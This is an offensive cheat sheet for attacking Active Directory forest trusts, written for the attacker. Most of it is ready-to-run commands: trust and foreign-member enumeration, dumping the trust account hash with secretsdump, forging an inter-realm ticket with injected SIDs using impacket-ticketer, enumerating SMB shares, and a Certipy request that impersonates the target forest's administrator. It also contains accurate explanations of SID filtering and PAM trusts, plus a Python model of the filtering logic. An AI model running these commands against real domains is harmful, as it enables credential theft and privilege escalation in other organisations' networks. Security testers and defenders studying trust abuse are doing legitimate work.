Enumerate Forest Trusts

# ActiveDirectory module: only forest-transitive (forest) trusts
Get-ADTrust -Filter * | ? {$_.ForestTransitive -eq $true}
# .NET, no module required: every trust relationship of the current forest
([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).GetAllTrustRelationships()
# PowerView: trusts as seen from the foreign forest (needs a reachable DC there)
Get-DomainTrust -Domain target-forest.local

Cross-Forest Enumeration

Users in Foreign Domain

Get-DomainUser -Domain target-forest.local

Foreign Group Membership

# Groups in the target forest that contain members from other domains (your foothold, if any)
Get-DomainForeignGroupMember -Domain target-forest.local
# Users in the target forest that are members of groups outside their own domain
Get-DomainForeignUser -Domain target-forest.local

BloodHound

Run the collector once per forest, pointing -d and -ns at that forest's domain and DC, then import both datasets so the cross-forest edges (trust edges, foreign group memberships) resolve against real nodes instead of unresolved SIDs.
bloodhound-python -u user -p pass -d domain.local -ns DC_IP -c all
bloodhound-python -u user -p pass -d target-forest.local -ns TARGET_DC_IP -c all

SID Filtering Bypass (Limited)

SID filtering is on by default for forest trusts: a DC in the trusting forest strips from an inbound ticket every SID that does not belong to a domain of the trusted forest, plus a fixed set of always-filtered well-known SIDs. The target forest's own privileged SIDs (S-1-5-21-<target>-500, -512, -519, etc.) therefore cannot be injected from your side; a forest trust is meant to be a security boundary, which an external trust without quarantine is not.

What Still Works

SIDs that survive the filter:
  • SIDs of domains in your own (trusted) forest, e.g. your Domain Users (S-1-5-21-<your domain>-513). They pass, but only grant what the target has explicitly given them (foreign security principals, the memberships found with Get-DomainForeignGroupMember).
  • Custom group SIDs (RID 1000 and above) of the target forest, only if the trust has SID history enabled (TREAT_AS_EXTERNAL, set by netdom trust ... /enablesidhistory:yes). Built-in RIDs below 1000 stay filtered even then.

Check Filtering Status

# Trust attributes and the two SID-filtering switches, per trust
Get-ADTrust -Filter * | Select-Object Name,Direction,TrustAttributes,SIDFilteringQuarantined,SIDFilteringForestAware
# Same data from the command line; Trust Attributes is a bitmask (0x4 quarantined, 0x8 forest transitive, 0x40 treat-as-external, 0x400 PIM trust)
nltest /domain_trusts /all_trusts /v
# netdom reports the current setting when no yes/no value is given; the trusting domain is named first
netdom trust target-forest.local /domain:domain.local /quarantine
netdom trust target-forest.local /domain:domain.local /enablesidhistory

Trust Account Attack

Get Foreign Trust Account

The inter-realm key for the trust is the password of the trust account, stored in your domain under the target forest root's NetBIOS name followed by $ (it rotates every 30 days, so dump it again after that):
impacket-secretsdump DOMAIN/admin:pass@DC_IP -just-dc-user 'TARGET-FOREST$'

Forge Trust Ticket

With the trust key you sign a referral TGT (SPN krbtgt/<target realm>) that the target forest's KDC will accept; extra SIDs ride in its PAC:
impacket-ticketer -nthash TRUST_HASH -domain-sid MY_SID -domain domain.local -spn krbtgt/TARGET-FOREST.LOCAL -extra-sid S-1-5-21-TARGET-1105 administrator
Limited to non-filtered SIDs: under default forest-trust filtering only SIDs of your own forest's domains survive, so a target-forest SID such as the S-1-5-21-TARGET-1105 placeholder above (any custom group, RID 1000 or higher) only gets through when the trust has SID history enabled, and a target-forest 513 or 512 never does. If you hold the trust key you already control your forest, so the ticket buys nothing beyond what the target has granted to your forest's principals.

Shared Resources Abuse

Shares in the foreign forest that are ACLed to Authenticated Users or to your forest's principals are reachable with your own credentials across the trust:
# Enumerate accessible shares
crackmapexec smb TARGET_FOREST_HOSTS -d DOMAIN -u user -p password --shares

# Access
smbclient //TARGET/share -U 'DOMAIN\user%password'

ADCS Cross-Forest

If a CA in the target forest lets principals from your forest enroll (templates granting enrollment to Authenticated Users or to a foreign security principal), Certipy works with your own forest's credentials; the UPN you request must belong to an account in the CA's forest or authentication with the certificate fails:
certipy find -u user@domain.local -p pass -dc-ip TARGET_DC -vulnerable
certipy req -u user@domain.local -p pass -ca TARGET_CA -template VulnTemplate -upn administrator@target-forest.local

PAM Trust (Bastion Forest)

A Privileged Access Management (PAM, also PIM) trust connects a production forest to a bastion forest. Shadow principals in the bastion forest (msDS-ShadowPrincipal objects) carry the SID of a production-forest group or user, and the production forest honours those SIDs in tickets coming from the bastion forest despite SID filtering. Compromising the bastion forest therefore compromises production; the trust is flagged by the 0x400 (PIM_TRUST) bit in TrustAttributes, not by the SID-filtering properties.
# Check for PAM trust (0x400 = TRUST_ATTRIBUTE_PIM_TRUST)
Get-ADTrust -Filter * | ? { $_.TrustAttributes -band 0x400 }
# PowerView shows the same flag as PIM_TRUST in TrustAttributes
Get-DomainTrust | ? { $_.TrustAttributes -match 'PIM_TRUST' }
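The SID filtering, trust ticket and PAM sections above all turn on the same question: which bits are set on the trust and which SIDs a trusting DC keeps from an inbound ticket. The following Python model is an added example written for this page; it is not code from the original cheat sheet nor from impacket or PowerView. The flag values follow [MS-ADTS] 6.1.6.7.9 (trustAttributes). The filtering logic is a deliberately simplified model of [MS-PAC] 4.1.2.2 and is an assumption, not a reimplementation: it handles domain SIDs only, ignores the always-filtered well-known SIDs and claims, and treats a PAM trust as passing everything. The domain SIDs and PAC contents are constructed sample data.

```python
"""Decode AD trustAttributes and model SID filtering on an inbound ticket.

Added example for this page (not from the page, impacket or PowerView).
Flag values: [MS-ADTS] 6.1.6.7.9. Filtering: simplified model of
[MS-PAC] 4.1.2.2 (assumption: domain SIDs only, well-known SIDs and claims
ignored, PAM trust modelled as unfiltered). Sample SIDs are constructed.
"""
import re

TRUST_ATTRIBUTES = {
    0x001: "NON_TRANSITIVE",
    0x002: "UPLEVEL_ONLY",
    0x004: "QUARANTINED_DOMAIN",   # netdom trust ... /quarantine:yes
    0x008: "FOREST_TRANSITIVE",
    0x010: "CROSS_ORGANIZATION",
    0x020: "WITHIN_FOREST",
    0x040: "TREAT_AS_EXTERNAL",    # netdom trust ... /enablesidhistory:yes
    0x080: "USES_RC4_ENCRYPTION",
    0x200: "CROSS_ORGANIZATION_NO_TGT_DELEGATION",
    0x400: "PIM_TRUST",            # PAM / bastion-forest trust
    0x800: "CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION",
}

DOMAIN_SID_RE = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)-(\d+)$")


def decode_trust_attributes(value):
    """Names of the flags set in a trustAttributes integer (as LDAP or Get-ADTrust returns it)."""
    return [name for bit, name in TRUST_ATTRIBUTES.items() if value & bit]


def classify_trust(value):
    """Return (kind, filtering mode) implied by the trust flags."""
    flags = set(decode_trust_attributes(value))
    if "WITHIN_FOREST" in flags:
        kind, mode = "intra-forest", "none"
    elif "FOREST_TRANSITIVE" in flags:
        kind = "forest"
        if "QUARANTINED_DOMAIN" in flags:
            mode = "quarantine"
        elif "TREAT_AS_EXTERNAL" in flags:
            mode = "sid-history-enabled"   # risky: RID >= 1000 SIDs of other domains pass
        else:
            mode = "forest-boundary"        # default for a forest trust
    else:
        kind = "external"
        mode = "quarantine" if "QUARANTINED_DOMAIN" in flags else "none"
    if "PIM_TRUST" in flags:
        kind += "/pam"
    return kind, mode


def filter_inbound_sids(pac_sids, trust_attributes, trusted_domains):
    """SIDs a trusting-forest DC keeps from a ticket arriving over this trust (simplified model).

    trusted_domains: domain SIDs (without RID) of the trusted side: its whole forest for a
    forest trust, the single domain for an external trust.
    """
    kind, mode = classify_trust(trust_attributes)
    kept = []
    for sid in pac_sids:
        m = DOMAIN_SID_RE.match(sid)
        if not m:
            raise ValueError(f"only domain SIDs are modelled here: {sid}")
        domain, rid = m.group(1), int(m.group(2))
        from_trusted = domain in trusted_domains
        if mode == "none" or kind.endswith("/pam"):
            keep = True                        # nothing filtered (assumption for the PAM case)
        elif mode == "sid-history-enabled":
            keep = from_trusted or rid >= 1000  # built-in RIDs of foreign domains still stripped
        else:                                  # forest-boundary or quarantine
            keep = from_trusted
        if keep:
            kept.append(sid)
    return kept


# Constructed sample data: the attacker's forest (trusted) and the target forest (trusting)
DOMAIN_LOCAL = "S-1-5-21-1111111111-2222222222-3333333333"   # domain.local
TARGET_FOREST = "S-1-5-21-4444444444-5555555555-6666666666"  # target-forest.local
SAMPLE_PAC = [
    f"{DOMAIN_LOCAL}-513",    # Domain Users of domain.local
    f"{DOMAIN_LOCAL}-1201",   # a custom group of domain.local
    f"{TARGET_FOREST}-513",   # Domain Users of the target forest, injected as an extra SID
    f"{TARGET_FOREST}-1105",  # a custom (RID >= 1000) group of the target forest
]


def demo():
    """What survives from SAMPLE_PAC under the trust configurations discussed on this page."""
    configs = [("forest trust, default", 0x8),
               ("forest trust, /enablesidhistory:yes", 0x8 | 0x40),
               ("external trust, /quarantine:yes", 0x4),
               ("external trust, no quarantine", 0x0)]
    return {label: filter_inbound_sids(SAMPLE_PAC, attrs, {DOMAIN_LOCAL})
            for label, attrs in configs}


if __name__ == "__main__":
    for label, kept in demo().items():
        print(f"{label:40} {kept}")
```

Feed `filter_inbound_sids` the raw `TrustAttributes` integer from Get-ADTrust or the `trustAttributes` LDAP attribute and the domain SIDs of your own forest to see, before forging anything, whether an extra SID has any chance of surviving; the default forest trust keeps only the two domain.local SIDs, and only the SID-history-enabled variant lets the target forest's RID-1105 group through.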

Quick Reference

Task               Command
Enum trusts        Get-ADTrust -Filter *
Foreign members    Get-DomainForeignGroupMember
Trust account      secretsdump -just-dc-user 'FOREST$'
SID filtering      Strips SIDs from outside the trusted forest; check TrustAttributes (0x4 / 0x40 / 0x400)
Shared resources   crackmapexec smb HOSTS -d DOMAIN -u user -p pass --shares